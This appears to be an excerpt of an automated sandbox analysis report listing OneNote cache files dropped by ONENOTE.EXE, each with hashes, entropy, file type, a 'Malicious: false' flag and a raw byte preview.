SSDEEP:	6:D0CANu+y71vRI9mpM9m6+y7Fi1EU9l/SZInLx8felBkls0CluJD/2ke1xDRlsllb:D0COuHuxpfijjseIW0K1tsl0EwQEiEM
MD5:	94E09C11FD60CBCFA7F175DF67B153AD
SHA1:	044355574E30716F656D8438758893E9F3EDFA46
SHA-256:	93674B1B6340F3F229675224E9C74C8129A2B93BD54D42E52C07B6293D81CD64
SHA-512:	9263840D0F7F8C5BB05CD29F72D90610BA6919764C3B37EAB55D55B5676B8E7909EAB3EC297C39337A9DC9EC0C2383456EBE4C68FE7D69038896C02C9B51AC83
Malicious:	false
Preview:	2...>...............................................................................................................................................................................................................h..K.p.G....d.......d...SYH.W...).d...SYH.W...).d......h..K.p.G.....................................................................................................$.....\.......N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s...........................d...c..,........................ ..$.................... ..$p...........z.5..k.E...$y./r......p.B....E....v^t.....N...^...........................................................................................................p.B....E....v^t.....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.527945276432417
Encrypted:	false
SSDEEP:	6:jhzcHlla65To9w5To9P3llvmthku/yLx8Olu39iGq8Xw1Em8b:jRcH/55H5UltcnV3bTQEz
MD5:	E120D218B4341C0DC7C217902258567E
SHA1:	DB9DBD9578AE00B93724477796EBD4D6C2B5DFDC
SHA-256:	3F219407E9B2DCB44B39AD131DE2A46506A75C2D79C077B0FC01B5C2E604E315
SHA-512:	EF3EC8B8D03F4926FC33E1D11EBE5CE0012A1048E5F9A75CFEF4C01F6099B121543A4F0CF704DD73103BD23E31D08D1F921C1C5445A3EE349AE9C4A5011F5696
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................%.8.....%.8....@.l^..X&.........................%.8....@.l^..X&.%.8..................................................%.8.....%.8.................................................%.8.....%.8\..............................................................4..1...(...(.......1.0.3.3.................p.........R!.>.B.Of'...............]T.).@..F8[s......N...^............................................................................................................]T.).@..F8[s......................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6114155603767084
Encrypted:	false
SSDEEP:	6:90CwgFEFktnk2sX9/Lx88cbrMkq2Sz1semw1Ebf0:eCwJKyPnkNYqfQEbf0
MD5:	1EC49F20314208F313A7D705FF0A14B9
SHA1:	61958B6262DCBD6DFB106C99CA57AEBF7E3B6A24
SHA-256:	47F8AB9B03CB10CE0D308A81F8793FDEFCF4D14BD2334B5A92A003E065B31F25
SHA-512:	1B209200ED813523362102D9EAB462D5689688B5556B4E4DA53E832B505AFFE949EC0D114059A556326E2FB6948293B659E2D2EA42F73B367C9DB990A1E4175A
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................2.......2....iL.=.X.............................2....iL.=.X.....2....................................................2.......2...................................................2..."...2.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.........){rf*I.................B....C...X,.......N...^............................................................................................................B....C...X,.......................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8031788779109649
Encrypted:	false
SSDEEP:	12:EE8rBmrgsmrlhYJtxplvsD4Irj7m1Ldh8o6/QEw6z:2mrgsmrlKnAj7udP6U
MD5:	0DCF3883A0F8FAD266EC7F99F4D02C5F
SHA1:	60D91C99FC68D141418F8A55DB7251B9675C6493
SHA-256:	05A3B177D1DEB217F9FA3F2D31427A34FFBACE41A7CC021093ACF5E8388CD892
SHA-512:	BBABB7D4EF4AA94F56C1148A0BA31D03794D4FFE6F87B8E0C02560AE2D343BEFDB78707416F3D2F349B5087291B9FF002B74EC062842463DA083F4408F7F9A06
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................PCL.....PCLP.QVH.Y...{.n.......n.....5H.;.....-n.....5H.;.....-n...PCLP.QVH.Y...{.PCL..............................PCL.....PCL.................................................PCL..%..PCL\....PCLN."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........................n....c..,...................PCL.. ..$...............PCL.. ..$p...........5/.....A..W.7..'...........,CH.\.3%P.d....N...^................................................................................................................,CH.\.3%P.d............................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5009875432628572
Encrypted:	false
SSDEEP:	6:jhzcM/TpiLR2iJlyLx8Olu33W8dAsGvsEX3w1E2vsEX7:jRcCli/lV3Ge4siQEIsa
MD5:	A60AFE925A5EF0FFA80008597C5D4AF7
SHA1:	FAE47A3EDAF3158BD17045260E06DED6ABE53FB5
SHA-256:	0930D6C0424F50FF7D00709A4CB1EB83C9C35C10041F4C584CFD913DD93E46EC
SHA-512:	5FDEC6597C4BAA2E194324967DE98368B62624D743661871FD5DE7E9D4D62E7EFE0372BDDDA7D08B0C6CAF397B8FF5C63C9695107A3E07D0CB0B16E0F8CC444F
Malicious:	false
Preview:	2...>..................................................................................................................................................................................................................K.2b....................................K.2b.................................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.................p........9...IJG....+.;................J.L...t........N...^................................................................................................................J.L...t........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.360432590927465
Encrypted:	false
SSDEEP:	96:S/s+kN/Oc7AaSmNEV0yBXR96kRQymdPNirKwL:2sPOc7AaSDJBXR96kRJmd
MD5:	F31A2EC8CE43183D2E3BBBF6E790305C
SHA1:	455AFBFE22A53D23C8C9CE94EAA70351BF612FC0
SHA-256:	F5D76D2C9432B42157723F9D9F0A430B1E88E42E6B6675876618D6D4088B83E4
SHA-512:	A1713510C04DC0B6C9AC8FCDE1D18526ADE5145BB5F3D0586D5202ED3DF1F87A3868BDDD7BDCBEA4D7CA9F06DD6A51F6AF2175310DE0759720EE1EC948FFF3D0
Malicious:	false
Preview:	2...>.......V...v...J...................................................................................................................................2...>...2.......v...~......................................k.QG./}"..gRJ.I.......I.qk..B.....LZ...k.QG./}"..gRJ.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............ps7...5./.........N...^...............(..W...L...C.S.........f........................................I.qk..B.....LZ..............ps7...5./...............ps7...5./.............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3433522191243314
Encrypted:	false
SSDEEP:	48:ZjNqBsFQiP3oYntLnmEKd79BXR9WVQoAkrdQqr9mNBX6jmq2lGqjJEg:NNqBsfYsoEKd5BXR95HkRQy0NuEJE
MD5:	EF82739C19B48199C2A8196720B10764
SHA1:	5DF313C44D5CC257E6C50D6C344844E315D5420A
SHA-256:	FC6EB9E629476876532E38F7D43F363CFE9769ACAE82D1C835BAA56D134B3AB5
SHA-512:	667CFD77DBB043ABCD9DDA7557548CAE6FBFFB1855DDF2CDD4730C802759CF07A50D19736A8F9F98E3CACCF3EEE04601AE9D422E9FC904FC4DB93CE237C58C8B
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZK0......K0.r.p].&v.t\|..+K0.r.p].&v.t\|..+K0...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............._a.6.o...j.xoI.R....N...^................S.\|.9O.ls..N.H........f........................................I.qk..B.....LZ............_a.6.o...j.xoI.R........_a.6.o...j.xoI.R.........K0......K0......K0..........................................K0.j....K0.T.]..K0......K0..B..K0.H....K0...B..K0...>.)K0...J...................;........4...4...4.."..............K0..K0..K0...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........K0......K0.....#K0.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.329371239315509
Encrypted:	false
SSDEEP:	96:nAfsbqBVfXwDSbdEDXTA9iQRQyEAUDU7M:nAfsOBVfJb6DX09iQRJbC
MD5:	682FF44213C6143299D9198EBAC6BD2A
SHA1:	3AC9F4F80214D59BAF6D10750DFC5C2DBE5168E9
SHA-256:	0B36E5FB7F5958DC1394331F3F25E3080BC5C5331606D56C6E9CA57A9A80E364
SHA-512:	ECA838C991EF416E69C1D4F7FABDCA46DEF23DC362287AFC9D8FD92D62437FCE578CFCAE8413DD70DA2F39CE0654406C74FE1F4CF0010756E58C928099A56C45
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ[@......[@...T......4...[@...T......4...[@...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................8.2jtu.#.<....N...^..................j\|..O................f........................................I.qk..B.....LZ.................8.2jtu.#.<.............8.2jtu.#.<.........[@......[@......[@..........................................[@.j....[@.T.]..[@......[@..B..[@.H....[@...B..[@...>.)[@...J...................;........4...4...4.."..............[@..[@..[@...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........[@......[@.....#[@.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.364944795301563
Encrypted:	false
SSDEEP:	96:EsQYgD68xLEXNrxPpXiD9zcRQyyTPjxooq0LI:EsQYgD6RXNNpX49zcRJyTPjxooq6I
MD5:	B35713F50E872A0390AEBE9DF76CA73F
SHA1:	04B85DDC120B5E13B94C134F1A91823FFB9761B6
SHA-256:	40492AB10C331957155A27761F0FCA65FA9C6960F0FCDB45651B6AA660B066B2
SHA-512:	BEA82A3EECA35AC99DF4BA99C578DEB7999BDD125F2669431DFE02572079D35CE3CB8437740F9E8852AEE1D51AFC2C7F327E8F70C0080D45C488215CC917AFA4
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.............t..0^:...w.....t..0^:...w.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............z?.f...KH..u~....N...^................o.g...O...V]k.........f........................................I.qk..B.....LZ..............z?.f...KH..u~..........z?.f...KH..u~........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.365705631585288
Encrypted:	false
SSDEEP:	96:2sCWDnhEmdrIX4I9+wRQyGTBUQXcMzQ31J:2sRD+m6Xp9+wRJGT+QXcMzQFJ
MD5:	DB3F61AABB7C11BD79CCAF01CEB13B74
SHA1:	9641AD25C2CE3C76D4A3A9FAE3F321733B5C35C7
SHA-256:	6781A70546C0D2F6820F29F7FCD71723F4EDB1BF4F6DD951E90F3F6D678B6948
SHA-512:	981A3FF50D514BD64A9639C5111C4B9CF887E53642A57201BFB0A30FBF0065FD532E9EE5CF623E2425107B02B52DAFF69EE000CA745ED48C1552BF6CECD2FEE1
Malicious:	false
Preview:	2...>.......V...v...J...................................................................................................................................2...>...2.......v...~............................I.......I.qk..B.....LZ..q.......q..;../?.....J..q..;../?.....J..q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............rf...5.ne.......N...^...............G-...M.K...............f........................................I.qk..B.....LZ..............rf...5.ne.............rf...5.ne..............q.......q.......q...........................................qj......qT.]....q.......q..B....qH......q..B....q..>.)..q..J...................;........4...4...4.."................q...q...q..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........q.......q....#..q............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000050.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.516141761953505
Encrypted:	false
SSDEEP:	48:esgPi3uOmFb61YKQtUEepX29M18oofsrdQVruWBBXWgGkXxt7F:esB+O6b6i3WEuX29MylfsRQ53Eqj7
MD5:	CAED24FDE5D98EE77BBCE98B51489E44
SHA1:	0C772969BCA6C3E2DEA5C8D369503C1BD7033D24
SHA-256:	DB774D9A13D6CFE2D781DF7388EB8DA665EDB37E9EC210D89B22ACB4D82901A7
SHA-512:	725DC39ABEADDCCB156077956CB1D9531BB79A7661E516104F9961C3F4CBC4D78D7C0BC208A3D9538ECF167683698DC8383EDCD43B1E06C82AF9CA5235EB86FE
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZC.......C..(.'..0."..5].C..(.'..0."..5].C....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............H.......,.......N...^..................z...E.pc..%].........Z........................................I.qk..B.....LZ..............H.......,.............H.......,............C.......C.......C...........................................C..j....C..T$c..C.......C..G..C....H..C....>..C.......C.. .3...................;........4...4...4.."..............C...C...C....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........C.......C......#C..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3445866317121675
Encrypted:	false
SSDEEP:	48:KxsSZ8joA/TFtRTnbED50kBXQkB9uzoRrdQqrPzZBXjFmobU4a/CWod:KxsF/TF3nE2AXQA9uzQRQyP1Se5
MD5:	F134AFE30C278A23B23B9756FE99B996
SHA1:	CF2A68F873BCEFB4833B4E7A2E34956F5BF6C9D9
SHA-256:	539C3A0AC4E0CDEAC2F292FACD810C250B7F2A5A23CF8113A70710032436A04B
SHA-512:	27FC3F8660552675FD3A58DC670D0D904E67F54501B5D070B04DC0D0DF38357A6EC176D68E437A095F1F7FC1CFF8318DBF6DF020636E7D36879BE7CE0BD5ED08
Malicious:	false
